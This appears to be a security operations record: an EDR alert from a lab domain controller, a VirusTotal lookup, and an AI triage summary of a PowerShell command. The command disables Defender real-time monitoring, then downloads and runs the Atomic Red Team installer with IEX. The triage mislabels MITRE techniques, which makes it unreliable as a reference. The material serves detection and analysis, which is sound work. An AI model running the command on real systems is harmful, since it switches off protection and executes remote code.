{
  "author": "ckeller@fusioncybersecurity.us",
  "cat": "Realtime Monitoring Process Killed PID 7640",
  "detect": {
    "event": {
      "BASE_ADDRESS": 140694944940032,
      "COMMAND_LINE": "PowerShell.exe  Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1567.003 -CheckPrereqs ; Invoke-AtomicTest T1567.003 -GetPrereqs ; Invoke-AtomicTest T1567.003 ",
      "FILE_IS_SIGNED": 1,
      "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
      "MEMORY_USAGE": 143122432,
      "PARENT": {
        "BASE_ADDRESS": 140698856259584,
        "COMMAND_LINE": "cmd.exe /C C:\\Windows\\TEMP\\pld368E.tmp.bat T1567.003 ",
        "FILE_IS_SIGNED": 1,
        "FILE_PATH": "C:\\Windows\\System32\\cmd.exe",
        "HASH": "3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2",
        "MEMORY_USAGE": 4661248,
        "PARENT_ATOM": "d2b1ecad7af81b32ac16ae0d69c2a7fe",
        "PARENT_PROCESS_ID": 3496,
        "PROCESS_ID": 7640,
        "THIS_ATOM": "45e4e3418a6f8c858f274b1569c2a828",
        "THREADS": 3,
        "TIMESTAMP": 1774364711483,
        "USER_NAME": "NT AUTHORITY\\SYSTEM"
      },
      "PARENT_PROCESS_ID": 7640,
      "PROCESS_ID": 3268,
      "THREADS": 33,
      "USER_NAME": "NT AUTHORITY\\SYSTEM"
    },
    "routing": {
      "arch": 2,
      "did": "",
      "event_id": "db1e086f-3311-40f1-a0bf-1eded3473d79",
      "event_time": 1774364713278,
      "event_type": "NEW_PROCESS",
      "ext_ip": "67.60.122.240",
      "hostname": "df-labsdc01.dflabs.local",
      "iid": "47501359-645e-4049-906e-e6195da7afcf",
      "int_ip": "192.168.45.129",
      "latency": 3047,
      "moduleid": 2,
      "oid": "ad19afae-3759-4207-b06e-8648b225c455",
      "parent": "45e4e3418a6f8c858f274b1569c2a828",
      "plat": 268435456,
      "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
      "tags": [
        "domain-controller",
        "fusion-soc-alert",
        "fusion-soc-case",
        "fusion-soc-pulled",
        "fusion-soc-triage"
      ],
      "this": "59a8d473d7fb33057005984369c2a82b"
    }
  },
  "detect_id": "1b0cf140-7742-4a19-971a-0d1d69c2a82c",
  "gen_time": 1774364716327,
  "link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364713\u0026selected=59a8d473d7fb33057005984369c2a82b",
  "namespace": "general",
  "routing": {
    "arch": 2,
    "did": "",
    "event_id": "db1e086f-3311-40f1-a0bf-1eded3473d79",
    "event_time": 1774364713278,
    "event_type": "NEW_PROCESS",
    "ext_ip": "67.60.122.240",
    "hostname": "df-labsdc01.dflabs.local",
    "iid": "47501359-645e-4049-906e-e6195da7afcf",
    "int_ip": "192.168.45.129",
    "latency": 3047,
    "moduleid": 2,
    "oid": "ad19afae-3759-4207-b06e-8648b225c455",
    "parent": "45e4e3418a6f8c858f274b1569c2a828",
    "plat": 268435456,
    "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
    "tags": [
      "domain-controller",
      "fusion-soc-alert",
      "fusion-soc-case",
      "fusion-soc-pulled",
      "fusion-soc-triage"
    ],
    "this": "59a8d473d7fb33057005984369c2a82b"
  },
  "source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
  "source_rule": "general.RealTime Monitoring Tampering",
  "ts": 1774364716000
}

{
  "virustotal": {
    "malicious": false,
    "provider": "virustotal",
    "reputation": 73,
    "stats": {
      "confirmed-timeout": 0,
      "failure": 0,
      "harmless": 0,
      "malicious": 0,
      "suspicious": 0,
      "timeout": 0,
      "type-unsupported": 4,
      "undetected": 72
    }
  }
}

{
  "confidence": 0.9,
  "false_positive_reason": null,
  "investigation_questions": [
    "What other processes were spawned by PID 3268?",
    "Are there any new registry keys or files created during this session?",
    "Was the SYSTEM account used for other suspicious activities in the last hour?",
    "Is there evidence of credential dumping (T1003) associated with this event?"
  ],
  "ioc_analysis": "The process is running from its expected location (System32) and is Microsoft-signed, which creates a false positive scenario. However, the command line arguments are highly suspicious: they disable real-time monitoring, use Invoke-Expression to download code from an external source, and install offensive security tools (Atomic Red Team). The parent process chain shows cmd.exe spawning PowerShell, indicating a deliberate execution sequence.",
  "iocs_extracted": [
    {
      "type": "command_line",
      "value": "Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing)"
    },
    {
      "type": "url",
      "value": "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1"
    },
    {
      "type": "technique",
      "value": "T1567.003 (Exploitation of Remote Services)"
    }
  ],
  "mitre_techniques": [
    "T1567.003",
    "T1547.002",
    "T1568.001"
  ],
  "recommended_actions": [
    "Manual analyst review required \u2014 AI models (split)",
    "Isolate the host immediately to prevent lateral movement",
    "Block outbound traffic to redcanaryco/invoke-atomicredteam repository",
    "Review all PowerShell execution policies and disable remote code execution",
    "Check for persistence mechanisms in startup folders or scheduled tasks",
    "Collect memory dump for forensic analysis"
  ],
  "risk_score": 90,
  "severity": "high",
  "summary": "**Vote: SPLIT (1/2 -\u003e SUSPICIOUS)**\n\n### \u264a gemini-cli Analysis (Primary)\nFailed or timed out.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThis event represents a confirmed malicious activity where an attacker executed PowerShell commands to disable real-time monitoring and install the Atomic Red Team framework under SYSTEM privileges. The command line explicitly shows disabling Defender\u0027s real-time protection and downloading code from a GitHub repository known for offensive security testing tools.\n\n**IOC Analysis:** The process is running from its expected location (System32) and is Microsoft-signed, which creates a false positive scenario. However, the command line arguments are highly suspicious: they disable real-time monitoring, use Invoke-Expression to download code from an external source, and install offensive security tools (Atomic Red Team). The parent process chain shows cmd.exe spawning PowerShell, indicating a deliberate execution sequence.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** suspicious | **Confidence:** 0.85\nThe detection event involves a PowerShell process from C:\\Windows\\System32, which is a legitimate Microsoft-signed binary. However, the command line disables real-time monitoring and installs Atomic Red Team modules, indicating potential malicious intent or evasion techniques.\n\n**IOC Analysis:** The FILE_PATH is a known legitimate Windows system binary located in C:\\Windows\\System32, and it is signed by Microsoft, making it unlikely to be malicious based on its location and signature. However, the command line includes actions to disable real-time monitoring and install tools from GitHub, which are suspicious and often associated with bypassing security measures.",
  "verdict": "suspicious",
  "voting": {
    "auto_action": "manual_review",
    "mode": "split",
    "total_models": 2,
    "vote_summary": [
      "qwen3.5:4b: true_positive (critical, 95% confidence)",
      "deepseek-r1:8b: suspicious (high, 85% confidence)"
    ],
    "votes": [
      {
        "confidence": 0.95,
        "model": "qwen3.5:4b",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.85,
        "model": "deepseek-r1:8b",
        "verdict": "suspicious"
      }
    ],
    "winning_count": 1,
    "winning_verdict": "suspicious"
  }
}